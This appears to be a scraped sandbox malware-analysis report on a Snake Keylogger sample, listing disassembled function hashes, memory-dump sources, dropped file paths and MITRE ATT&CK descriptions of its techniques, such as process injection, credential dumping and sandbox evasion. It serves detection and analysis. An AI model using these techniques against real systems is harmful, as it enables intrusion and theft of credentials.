Opcode Fuzzy Hash: 0e5346e80fdbdf5f3d90177f02ee4830a8ae1a21af4c63338d66df069ed511af
Instruction Fuzzy Hash: FE114F70D002099FDB40EFA9D940B9EBBF2FB84304F10C5BAD0549B369EB785A06CB85

Function 004C5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d473127b162796b5305df7e36a188fa43cd27d1a6a614328fd297abcafd0c113
Instruction ID: f94a621d12ee0fbfcad702251ecbb735373c6105af8ef8fe613109f024de92b0
Opcode Fuzzy Hash: d473127b162796b5305df7e36a188fa43cd27d1a6a614328fd297abcafd0c113
Instruction Fuzzy Hash: AA01F532700515AFCB219F598800AFF3BA6EBC9751B19802FF405CB284DA7D9D5297A4

Function 004CE8E8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b23d09a2276e74e5f92c5f0fcde919df3b4126ceb678806fc65fa4e6c02749
Instruction ID: 4385bff2146b6a099cae5fc69d791d61f8ebbf7078da7fe16b6ce0305bd1670c
Opcode Fuzzy Hash: d6b23d09a2276e74e5f92c5f0fcde919df3b4126ceb678806fc65fa4e6c02749
Instruction Fuzzy Hash: DE112D74D8020AAFCB01CFA8D8459EEFBB1FB89311F10856AD910AB364D7395A16CF91

Function 004C28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f987dd00c75c6052a595423f4ce90099849c3a13c8e023c9148e19ba1bc935fa
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: f987dd00c75c6052a595423f4ce90099849c3a13c8e023c9148e19ba1bc935fa
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 004C28AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1156a78b313404b1777187330fcb27d13963c23dd02226433b8400cc7139cad
Instruction ID: 08e6756c93a258ca75b77695ffcfe2f032dab44d601cbaec4c194124a473cf35
Opcode Fuzzy Hash: f1156a78b313404b1777187330fcb27d13963c23dd02226433b8400cc7139cad
Instruction Fuzzy Hash: 9ED0C231D2032682CB00EBA59C000EEB734EE94222B558726D52032140EB31126886E1

Function 004CAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f32749dd05a0747ede0f6f521190dc269f905ab818fc4cfa4cfb5b3a742f330
Instruction ID: 1b8a83a09eb66b4938aeec0856a1c535c0d86a44769355ee116d0829efad8a66
Opcode Fuzzy Hash: 0f32749dd05a0747ede0f6f521190dc269f905ab818fc4cfa4cfb5b3a742f330
Instruction Fuzzy Hash: 1AD0673AB40008AFCB149F98E8449DDF776FB98221B44811AF915A3260C6319966DB64

Function 004C6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b533b129b5219d60507d7a15173089aaf392355eec613a07704d688f77df5938
Instruction ID: 49db3c3b5518ac6e8771a3e67d30aca9ce382b0ea4620cc2a22f1776516e16ac
Opcode Fuzzy Hash: b533b129b5219d60507d7a15173089aaf392355eec613a07704d688f77df5938
Instruction Fuzzy Hash: 04C012344403194FD611FF61DC49659779A66C0906784CD14A5050954DDE7C6D4A8795

Non-executed Functions

Function 004C6FC8 Relevance: 5.5, Strings: 4, Instructions: 499COMMON

Download Yara Rule

Strings

,q, xrefs: 004C728A
(oq, xrefs: 004C7220
(oq, xrefs: 004C7212
,q, xrefs: 004C7298

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: a1e1ed76a39a1a0f63ec671a71a1cd1ff1c43a1f123e2f994fdaf5ae5019f316
Instruction ID: e0067a88a09e7f310a3956d6539fe2829b09102bd9523abc439fd7db8bf665a3
Opcode Fuzzy Hash: a1e1ed76a39a1a0f63ec671a71a1cd1ff1c43a1f123e2f994fdaf5ae5019f316
Instruction Fuzzy Hash: D4122B74A042159FCB55CF69C884FAEBBB6BF89300F19806AE8059B361D739EC41CF59

Function 004CF961 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc7a44eb25a6247e9e0b082ba2b636a594d4e95be44fbe17a37e8dcdb36af338
Instruction ID: 775957da47d483469417a1cf2f9abdcb4411bbcfed1af8ca0d96079b690fab08
Opcode Fuzzy Hash: bc7a44eb25a6247e9e0b082ba2b636a594d4e95be44fbe17a37e8dcdb36af338
Instruction Fuzzy Hash: FEC1B374E00218CFDB54DFA5C945B9DBBB2BF89304F2080AAD809AB355DB399E85CF54

Function 004CF2C0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0986c79ebdc3e5ecc5a93d40677498fdea574a5394ffed185fe0d94371cd6eea
Instruction ID: b993b7900095fa20c573ca1c89755907aa02d53f12c02d32c93df148c312cb6d
Opcode Fuzzy Hash: 0986c79ebdc3e5ecc5a93d40677498fdea574a5394ffed185fe0d94371cd6eea
Instruction Fuzzy Hash: 6F513678D00208DBDB44DFA9C545BEEBBB2BB89304F20C56ED404AB295C77D9985CF58

Function 004CF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a1cbc75f329d977dc0a8d1001bcda230722e619c66598cf42a0c0b1bb8f1eb
Instruction ID: ffc88940237641d640c3058ba84d7ea2fa520e8e1e2b43a37763efc634caffd4
Opcode Fuzzy Hash: d2a1cbc75f329d977dc0a8d1001bcda230722e619c66598cf42a0c0b1bb8f1eb
Instruction Fuzzy Hash: 75511178D00208DFDB44DFA8C585BEEBBB2BB49304F20852ED405AB295C73D9889CF58

Function 004C76F1 Relevance: 10.5, Strings: 8, Instructions: 477COMMON

Download Yara Rule

Strings

(oq, xrefs: 004C7BFF
(oq, xrefs: 004C7C0F
,q, xrefs: 004C7BA0
(oq, xrefs: 004C772E
(oq, xrefs: 004C77E9
(oq, xrefs: 004C78B2
,q, xrefs: 004C7B90
(oq, xrefs: 004C7815

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 0cdefbf065a88377e3198d4b4ad1533c136a689ff94239c8551ce28cfcc9e924
Instruction ID: cbb476ee53e2536e52e0c51e51e1c9811fc9534d288a25c1b1021b19fd52b464
Opcode Fuzzy Hash: 0cdefbf065a88377e3198d4b4ad1533c136a689ff94239c8551ce28cfcc9e924
Instruction Fuzzy Hash: C7125838A042099FCB64CF69D884EAEBBF1BF49314F14859AE8159B361DB38ED41CF54

Function 004C1A18 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

FI, xrefs: 004C1A47
FI, xrefs: 004C1B47
FI, xrefs: 004C1B10
FI, xrefs: 004C1B64

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: FI$FI$FI$FI
API String ID: 0-433960191
Opcode ID: 9d10a0e823d2e48f668ff182930bf01433c088941883650e2d784c0b9617ea1a
Instruction ID: 4c7325a9d1520b219b0a10a1c052eafbec5d9bc3d48b71a7e7167de511eb8d67
Opcode Fuzzy Hash: 9d10a0e823d2e48f668ff182930bf01433c088941883650e2d784c0b9617ea1a
Instruction Fuzzy Hash: 6E415274E012099FD705EFB9C441BAEBBB2EF86704F2084AED4005B356DB395E46CB96

Function 004C2A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xq, xrefs: 004C2A9E
Xq, xrefs: 004C2B57
Xq, xrefs: 004C2AD8
Xq, xrefs: 004C2BA4

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 04b0ca6e680de74fde019826bc030a52ab655e779962d27d174caef56f575279
Instruction ID: 5ee0b3a0e550eed0f83121748c5a95dc0ac209d918087a89329492d0ec3bca6b
Opcode Fuzzy Hash: 04b0ca6e680de74fde019826bc030a52ab655e779962d27d174caef56f575279
Instruction Fuzzy Hash: EA317534E003194BDFF4DF658A41B6FB7B6AB94300F14406EC419A7341EBB89E45CB96

Function 004C25B0 Relevance: 5.1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

Strings

;r^, xrefs: 004C25FD, 004C2602
FI, xrefs: 004C265F
FI, xrefs: 004C2618
FI, xrefs: 004C2642

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: ;r^$FI$FI$FI
API String ID: 0-2314611996
Opcode ID: 8d8b0fa40f52cdd38483398f2c62f9c20cdf9a9626c49c335616d9994a4ef4f3
Instruction ID: 484c5d89ab949e1153e94a6b22153ea4664de3053005dbc92cd1842da864d176
Opcode Fuzzy Hash: 8d8b0fa40f52cdd38483398f2c62f9c20cdf9a9626c49c335616d9994a4ef4f3
Instruction Fuzzy Hash: C6219174E01208AFDB05EFB9C441B9EBBB2EF86308F1084AED4005B355DB785A46CF55

Function 004C23D0 Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

FI, xrefs: 004C2438
FI, xrefs: 004C2462
[r^, xrefs: 004C241D, 004C2422
FI, xrefs: 004C247F

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: FI$FI$FI$[r^
API String ID: 0-544741145
Opcode ID: b8a93e1b7357180f8e57e45f7514b4dbfbaf79b7d5d8922d56e6d223c88d0519
Instruction ID: e692841a414810cee9d7f4f9bde39b6bf098a29ad0a059b583fbdf1807d3cfe6
Opcode Fuzzy Hash: b8a93e1b7357180f8e57e45f7514b4dbfbaf79b7d5d8922d56e6d223c88d0519
Instruction Fuzzy Hash: 0A218074E01208AFDB04EFB9C44179EBBB1EB85704F1084AED4019B295D7785A06CF45

Function 004C24C0 Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

Kr^, xrefs: 004C250D, 004C2512
FI, xrefs: 004C256F
FI, xrefs: 004C2552
FI, xrefs: 004C2528

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: FI$FI$FI$Kr^
API String ID: 0-2360890728
Opcode ID: c7337a202b8c830d4402da7961c994eb46c0beeb08d0b3c254d4ea7154053739
Instruction ID: 97b3024f6664ec7f09c7a966612c178eb2c54786f0f2541e9bd29a30d9f1631c
Opcode Fuzzy Hash: c7337a202b8c830d4402da7961c994eb46c0beeb08d0b3c254d4ea7154053739
Instruction Fuzzy Hash: 86219F74E01208AFDB05EFB9C445B9EBBB2EF86308F10C8AE94015B395DB785A06CF45

Function 004C26A0 Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

FI, xrefs: 004C274F
FI, xrefs: 004C2708
FI, xrefs: 004C2732
+r^, xrefs: 004C26ED, 004C26F2

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: +r^$FI$FI$FI
API String ID: 0-3615655497
Opcode ID: 353ff772a8efa461d6b5994ec2501d32ed39d2e1fb9054452d2b82c393578663
Instruction ID: eda1d754c2d9d718eaa8ec390501559dcbc67091e79645de2e623e34d366e574
Opcode Fuzzy Hash: 353ff772a8efa461d6b5994ec2501d32ed39d2e1fb9054452d2b82c393578663
Instruction Fuzzy Hash: 4A216B74E01208AFDB05EFBAD445B9EBBB2EB86308F10C4AE94015B295DB785A06CF55

Function 004C6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 004C695E
\;q, xrefs: 004C6936
\;q, xrefs: 004C692C
\;q, xrefs: 004C6952

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: a7e611f0a6484c11b83dfab9ade41255eaeab67fa7410c19d8e74e62ff46b418
Instruction ID: bfcd9ff7570c8020c346eb4f60d95fc2f64dadb1b891c34176dfd3b08b339211
Opcode Fuzzy Hash: a7e611f0a6484c11b83dfab9ade41255eaeab67fa7410c19d8e74e62ff46b418
Instruction Fuzzy Hash: 830184797001158FC7A48E2DC440F2677E6AF8876472AC16FE806CB370DA35EC428755

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lkETeneRL3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c543klpu.pdb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lodbonk4.gac.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skhhuy0i.acw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnivwamo.xht.ps1

C:\Users\user\AppData\Local\Temp\nso347D.tmp

C:\Users\user\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nondecreasing.Vgt

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udfring53.lev

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Ungallantness.kok

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Yaply50.txt

Windows Analysis Report
lkETeneRL3.exe

Function 0040322B Relevance: 94.9, APIs: 34, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 004051BA Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B75 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00405E85 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

